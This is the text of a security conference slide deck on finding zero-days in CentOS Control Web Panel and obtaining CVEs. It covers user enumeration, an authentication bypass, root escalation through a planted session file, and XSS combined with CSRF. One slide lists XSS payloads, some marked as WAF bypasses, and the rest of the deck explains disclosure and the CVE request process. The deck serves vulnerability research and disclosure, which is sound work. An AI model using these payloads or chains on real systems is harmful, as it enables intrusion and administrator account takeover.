2600 Thailand #50 From 0day to CVE

1. From 0day to CVE

2. Disclaimer
" This slide is purely intended for educational and research purposes only. We do NOT want anyone to
use any information from this slide to attack or do illegal thing (refer to the laws in your country). So
that, any actions and or activities related to the materials from this repository is solely your
responsibility. If you don’t agree, you are not allowed to access this slide, close this immediately “

3. Things I would like to share with you today
❑ 0-day
▪ How to choose your target
▪ The vulnerabilities
o User Enumeration
o Bypass Authentication
o Root Privilege Escalation
o Cross Site Scripting
o Cross Site Request Forgery
❑ CVE Request Process
▪ How to report to product owner
▪ How to request for CVE number
▪ How to public your exploit
▪ The problem we found

4. Since we are in cyber security field,
I would like to get my own CVE

5. Me
Hackerone,
Writeup

7. Duplicated man

8. Where should I Begin ...?

9. Which Application ...?

10. I don’t know...
But I can share how I choose my target

11. The application has online demo version

12. Play around with the demo version to estimate the target

13. Do not do malicious thing on the live demo
That’s not an UAT for pen-tester

14. Search for previous vulnerabilities

15. Test some of them on the latest version, let’s see if it available

16. Test some of them on the latest version, let’s see if it available
Add this

17. Check Rating

18. Check amount of usages
❑ Server’s signature, port, etc.

21. And finally, it should be easy to install
❑ Don’t for get taking snapshot
Snapshot #1 Snapshot #2 Snapshot #3
❑ Add User
❑ Set Application
❑ Config
❑ Easy installation

22. Tools
Client Server
HTTP Request
HTTP Response

24. User Enumeration

25. User Enumeration
❑ Loin with invalid username and invalid password
❑ Loin with valid username and invalid password
Valid Username
Invalid Username

26. Login with an invalid username and invalid password

27. Login with a valid username and invalid password

28. Brute-Forcing

29. Non-existing User
Existing User

30. User Enumeration
// Log in with an invalid password
If( res.msg == “Wrong password” ){
console.log(“User dose exist”);
} else {
console.log(“User dose not exist”);
}

31. Login with a valid username and invalid password

32. Login with an invalid username and invalid password

33. Non-existing User
Existing User

34. User Enumeration
// Log in with an invalid password
If( res.time > 80ms ){
console.log(“User dose exist”);
} else {
console.log(“User dose not exist”);
}

36. Bypass Authentication

37. Authentication

38. Authentication

39. Authentication
user1||/user1/theme/original
user2||/user2/theme/original
(Base64)
dXNlcjJ8fC91c2VyMi90aGVtZS9vcmlnaW5hbA==

41. Bypass Authentication
#2

42. Bypass Authentication #2

43. Authentication

44. Bypass Authentication #2

45. Since the product owner release it as the latest version

46. Privilege Escalation

47. Session File are in /tmp directory

48. Token is in the URL
Any Problem?!?!?!?

49. It is not a random value
Since the ‘rkey’ value is not random, there might be some factor that use to generate the value,
what is it?
o IP Address?
o MAC Address?

50. Set Client IP address

51. Login as root on a testing server

52. Extract session value from testing environment

53. Information we generate from testing server
cwpsrv-bad194011f5ad0cf609c77ad222e50d6 = 3hkhskb2coovn9bpkpuqivst42
/tmp/sess_3hkhskb2coovn9bpkpuqivst42
username|s:4:"root";logged|b:1;rkey|s:16:"w4wlTtbmZvQY8UA8";token|s:36:"cwp_a5711eb9525612
9d3304915661c6452e";

54. On the target, login and upload session file to /tmp

55. Set up attacker’s browser

56. Become root user

57. Vulnerabilities Chaining
o Server version disclosure o User Enumeration
o Bypass Authentication o Session in /tmp/sess_xxx
Require: Server signature Require: Target URL
Result: Target URL Result: Target Username
Require: Target Username
Result: Authenticated User
Require: Authenticates User
Result: High Privilege User (root)

58. Cross Site Scripting

59. Since we know the target was vulnerable with XSS

60. We must test every inputs

61. The thing we found

62. Success!!!

63. But the payload dose not execute

64. Till the administrator try to interact with the record such as delete

65. Change password

66. Change password
Password changed
Enter new password

67. What can I do with this

68. No need to know the current password?!?!?!?

69. XSS + CSRF = We’re root
❑ The payload will be redirect to malicious site

70. Since there is no CSRF token, so that XSS + CSRF = We’re root
❑ File poc.php

71. When administrator do action

72. The password has been changed

73. Test login with new password

74. We’re root

75. Tip and Trick payload XSS on twitter
#BugBounty, #BugBountyTip, #Writeup, #Infosec

76. #BugBounty #BugBountyTip #Writeup

77. #BugBounty #BugBountyTip #Writeup

78. My favorite XSS payload
'-confirm(document.domain)-'
'-prompt`1 `-'@blahblah.com
**Sucuri WAF XSS bypass**
"><input/onauxclick="[1].map(prompt)">
**CloudFlare bypass**
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
<svg onload=prompt%26%230000000040document.domain)>
<--`<img/src=` onerror=confirm``> --!>
</Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt>
</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>
**angular JS**
{{constructor.constructor('alert(1)')()}}
**bypass url redirect XSS**
%2500%27onmouseover=%27window.stop();alert(document.domain)%27style=%27font-size:1000px;background-color:red%27

79. Bonus
❑ https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/Other/XSS%20Payload.md
❑ https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/Other/Twitter.md

80. How to report to product owner

81. Through email
Ask them to
begin the
process

82. Give them the report

83. Skype!!!

84. We will have a good time with product owner
till the issue has been fixed

86. When the issue has been fixed
You should inform your friend that
you are going to public the vulnerability

87. This might happen to you

88. As we were friends, we need to understand each other

89. Time to request CVE

90. Common Vulnerabilities and Exposures (CVE )
• One identifier for one vulnerability or exposure
• One standardized description for each vulnerability or exposure
• A dictionary rather than a database

92. Find Vulnerability
- Web Application
- Buffer Overflow
- DoS
Contact Vendor
- Form on Website
- Email
- Other
Request CVE Number
Vendor Fix
Public Vulnerability
- Exploit DB
- Packet Storm
- GitHub
- Other
Send Link Public to CVE Mitre
CVE Mitre Update Vulnerabilities
NVD NIST analysis and score
Common Vulnerabilities and Exposures (CVE )

93. Request CVE Number

94. Fill the request form
Required
Optional

95. Explain your vulnerability

96. After submitting the request you must get this email

100. The CVE number are reserved

101. The status “RESERVED”

102. We need somewhere to public

103. Our choices
Other

104. Exploit-db

105. Check the public yourself, exploit-db will thanks you lately

106. Update every day (truly fast)

107. Git hub

108. Send the public URL back to CVE

110. Time to celebrate

111. It dose not end….

112. A few days later, NVD will give you score

113. A few days later, NVD will give you score

114. But we are not in ทุ่งลาเวเดอร์

115. What if the product owner dose not
response???

118. CVE will read and find more public
URL from your GitHub and
automatically update

119. I would like to update 1 CVE

120. But 3 CVEs have been updated

121. When you request CVE number, and
there is no email response

122. This will happen when you request CVE more than 1 time

123. We strongly recommend you save the details before make a request
❑ https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/Other/CVE%20Request%20Template.md

124. How long do I have to wait for
each process

125. It also depends on CVE and Exploit-DB team
Found
Vulnerability
Report to
vender
The issue has been fixed &
Inform vender public issue
Request for
CVE number
Public CVE
status
Public to
Exploit-DB
NVD Score
3 - 7 days3 - 7 days
3 - 7 days

126. Can it be faster ???

127. We can add CVE public link later
Found
Vulnerability
Report to
vender
The issue has been fixed &
Inform vender public issue
Request for
CVE number
Public CVE
status
NVD Score
Public CVE to
Packet Strom
3 - 7 days
3 - 7 days1 day
Add more
public URLs

128. If you request for many CVEs

130. Q & A

132. You can follow more vulnerabilities here
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

133. Hope this help
Thank you